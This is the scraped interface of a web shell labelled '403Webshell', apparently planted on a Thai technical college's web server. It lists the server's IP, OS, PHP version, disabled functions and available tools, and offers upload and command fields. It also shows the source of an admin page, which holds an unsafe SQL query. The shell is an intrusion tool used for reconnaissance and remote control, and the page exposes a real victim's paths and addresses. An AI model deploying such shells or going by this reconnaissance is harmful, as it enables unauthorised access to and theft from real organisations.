403Webshell
Server IP : 202.29.229.35  /  Your IP : 3.145.70.197
Web Server : Apache
System : Linux aapanel2 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User : www ( 1001)
PHP Version : 5.5.38
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/www.ivecr2.ac.th/system_admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/www.ivecr2.ac.th/system_admin/projecTec.php
<?php 
session_start();
if($_SESSION['r_statuslogin'] != 1){
 echo '<script language="javascript">alert("สำหรับผู้ดูแลระบบเท่านั้น")</script>';
 echo'<meta http-equiv="refresh" content="0;url=../index.php">';
 exit();
}
			$wrokID=$_SESSION['r_adID'];
			//echo "---++".$wrokID;
			$sqlwork="select * from tbladmin where adID='$wrokID' ";
			//echo $sqlwork;
			$resqlwork=mysql_query($sqlwork,$connect1);
			$rswork=mysql_fetch_array($resqlwork);
	?>
<html>
<head>
<title>ระบบเว็บวิทยาลัยเทคนิคลพบุรี</title>
  <script src="SpryAssets/SpryValidationSelect.js" type="text/javascript"></script>
  <script src="SpryAssets/SpryValidationTextField.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="style.css" />
<link href="SpryAssets/SpryValidationSelect.css" rel="stylesheet" type="text/css">
<link href="SpryAssets/SpryValidationTextField.css" rel="stylesheet" type="text/css">
</head>
<body>
<form action="?i=insert_projecTec" method="post" enctype="multipart/form-data" name="form1" id="form1">
  <table width="750" border="0" align="center" cellpadding="0" cellspacing="5">
    <tr>
      <td colspan="2" align="center" valign="top"><h1>.:: เพิ่มผลงาน ครู-อาจารย์ ::.</h1></td>
    </tr>
    <tr>
      <td align="right" valign="top">&nbsp;</td>
      <td align="left" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td align="right" valign="top">ผลงาน :</td>
      <td align="left" valign="top"><label for="selectUser"></label>
        <span id="spryselect1">
        <select name="selectUser" id="selectUser">
          <option value="1">ครู - อาจารย์</option>
          <option value="2">นศ.(โครงการต่างๆ)</option>
          <option value="3">นศ.(โครงงานวิทย์)</option>
          <option>---------เลือก---------</option>
        </select>
      <span class="selectRequiredMsg">*เลือกชนิดของผลงาน</span></span></td>
    </tr>
    <tr>
      <td align="right" valign="top">ขื่อเจ้าของผลงาน :</td>
      <td align="left" valign="top"><label for="pro_fname"></label>
        <span id="sprytextfield1">
        <input name="pro_fname" type="text" id="pro_fname" size="40">
        <span class="textfieldRequiredMsg">*ใส่ชื่อเจ้าของผลงานด้วยครับ</span></span>&nbsp;
    
     </td>
    </tr>
    <tr>
      <td align="right" valign="top">นามสกุล&nbsp;:</td>
      <td align="left" valign="top"><span id="sprytextfield3">
        <input name="pro_lname" type="text" id="pro_lname" size="40">
      <span class="textfieldRequiredMsg">ใส่นามสกุลเจ้าของผลงานด้วยครับ..</span></span></td>
    </tr>
    <tr>
      <td width="99" align="right" valign="top">รายละเอีดย :</td>
      <td width="636" align="left" valign="top"><!------------------text editor------------------------->
            <script src="ckeditor.js"></script>
		<!-- Sample 1 -->
		<textarea cols="80" id="detail" name="detail" rows="10"></textarea>
		
		<script>

			CKEDITOR.replace( 'detail');

		</script></td>
    </tr>
    <tr>
      <td colspan="2" align="left" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td colspan="2" align="left" valign="top"><table width="800" border="0" cellspacing="0" cellpadding="5">
        <tr>
          <td width="100" align="right" valign="top">ชื่อไฟล์1:</td>
          <td width="300" align="left" valign="top"><input name="title_file1" type="text" id="title_file1" size="35"></td>
          <td width="100" align="right" valign="top">แนบไฟล์ 1:</td>
          <td width="300">
            <input name="filedocument1" type="file" id="filedocument1" size="20" />
            <br>
            <font color="#FF0000">*.pdf .zip .rar</font></td>
        </tr>
        <tr>
          <td width="100" align="right" valign="top">ชื่อไฟล์2:</td>
          <td width="300" align="left" valign="top"><input name="title_file2" type="text" id="title_file2" size="35"></td>
          <td width="100" align="right" valign="top">แนบไฟล์ 2:</td>
          <td width="300">
            <input name="filedocument2" type="file" id="filedocument2" size="20" />
            <br>
            <font color="#FF0000">*.pdf .zip .rar</font></td>
        </tr>
        <tr>
          <td width="100" align="right" valign="top">ชื่อไฟล์:3</td>
          <td width="300" align="left" valign="top"><input name="title_file3" type="text" id="title_file3" size="35"></td>
          <td width="100" align="right" valign="top">แนบไฟล์ 3:</td>
          <td width="300">
            <input name="filedocument3" type="file" id="filedocument3" size="20" />
            <br>
            <font color="#FF0000">*.pdf .zip .rar</font></td>
        </tr>
        <tr>
          <td width="100" align="right" valign="top">ชื่อไฟล์4:</td>
          <td width="300" align="left" valign="top"><input name="title_file4" type="text" id="title_file4" size="35"></td>
          <td width="100" align="right" valign="top">แนบไฟล์ 4:</td>
          <td width="300">
            <input name="filedocument4" type="file" id="filedocument4" size="20" />
            <br>
            <font color="#FF0000">*.pdf .zip .rar</font></td>
        </tr>
        <tr>
          <td width="100" align="right" valign="top">ชื่อไฟล์5:</td>
          <td width="300" align="left" valign="top"><input name="title_file5" type="text" id="title_file5" size="35"></td>
          <td width="100" align="right" valign="top">แนบไฟล์ 5:</td>
          <td width="300">
            <input name="filedocument5" type="file" id="filedocument5" size="20" />
            <font color="#FF0000"><br>
            *.pdf .zip .rar</font></td>
        </tr>
        <tr>
          <td align="right" valign="top">ชื่อไฟล์6:</td>
          <td align="left" valign="top"><input name="title_file6" type="text" id="title_file6" size="35"></td>
          <td align="right" valign="top">แนบไฟล์ 6:</td>
          <td><input name="filedocument6" type="file" id="filedocument6" size="20" />
            <font color="#FF0000"><br>
            *.pdf .zip .rar</font></td>
        </tr>
        <tr>
          <td align="right" valign="top">ชื่อไฟล์7:</td>
          <td align="left" valign="top"><input name="title_file7" type="text" id="title_file7" size="35"></td>
          <td align="right" valign="top">แนบไฟล์ 7:</td>
          <td><input name="filedocument7" type="file" id="filedocument7" size="20" />
            <br>
            <font color="#FF0000">*.pdf .zip .rar</font></td>
        </tr>
        <tr>
          <td align="right" valign="top">ชื่อไฟล์8:</td>
          <td align="left" valign="top"><input name="title_file8" type="text" id="title_file8" size="35"></td>
          <td align="right" valign="top">แนบไฟล์ 8:</td>
          <td><input name="filedocument8" type="file" id="filedocument8" size="20" />
            <font color="#FF0000"><br>
            *.pdf .zip .rar</font></td>
        </tr>
        <tr>
          <td align="right" valign="top">ชื่อไฟล์9:</td>
          <td align="left" valign="top"><input name="title_file9" type="text" id="title_file9" size="35"></td>
          <td align="right" valign="top">แนบไฟล์ 9:</td>
          <td><input name="filedocument9" type="file" id="filedocument9" size="20" />
            <br>
            <font color="#FF0000">*.pdf .zip .rar</font></td>
        </tr>
        <tr>
          <td align="right" valign="top">ชื่อไฟล์10:</td>
          <td align="left" valign="top"><input name="title_file10" type="text" id="title_file10" size="35"></td>
          <td align="right" valign="top">แนบไฟล์ 10:</td>
          <td><input name="filedocument10" type="file" id="filedocument10" size="20" />
            <br>
            <font color="#FF0000">*.pdf .zip .rar</font></td>
        </tr>
      </table></td>
    </tr>
    <tr>
      <td align="right" valign="top">เขียนโดย :</td>
      <td align="left" valign="top">&nbsp;<?php echo $rswork['adFname']."&nbsp;&nbsp;".$rswork['adLname']."&nbsp;&nbsp;งาน :&nbsp;&nbsp;".$rswork['addepartment'];?></td>
    </tr>
    <tr>
      <td width="99" align="right" valign="top">&nbsp;</td>
      <td width="636" align="left" valign="top">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;
        <input type="submit" name="Submit" value="Submit" />
        &nbsp;&nbsp;
        <input type="reset" name="Submit2" value="Reset" /></td>
    </tr>
  </table>
</form>
<script type="text/javascript">
var spryselect1 = new Spry.Widget.ValidationSelect("spryselect1");
var sprytextfield1 = new Spry.Widget.ValidationTextField("sprytextfield1");
var sprytextfield2 = new Spry.Widget.ValidationTextField("sprytextfield2");
var sprytextfield3 = new Spry.Widget.ValidationTextField("sprytextfield3");
</script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit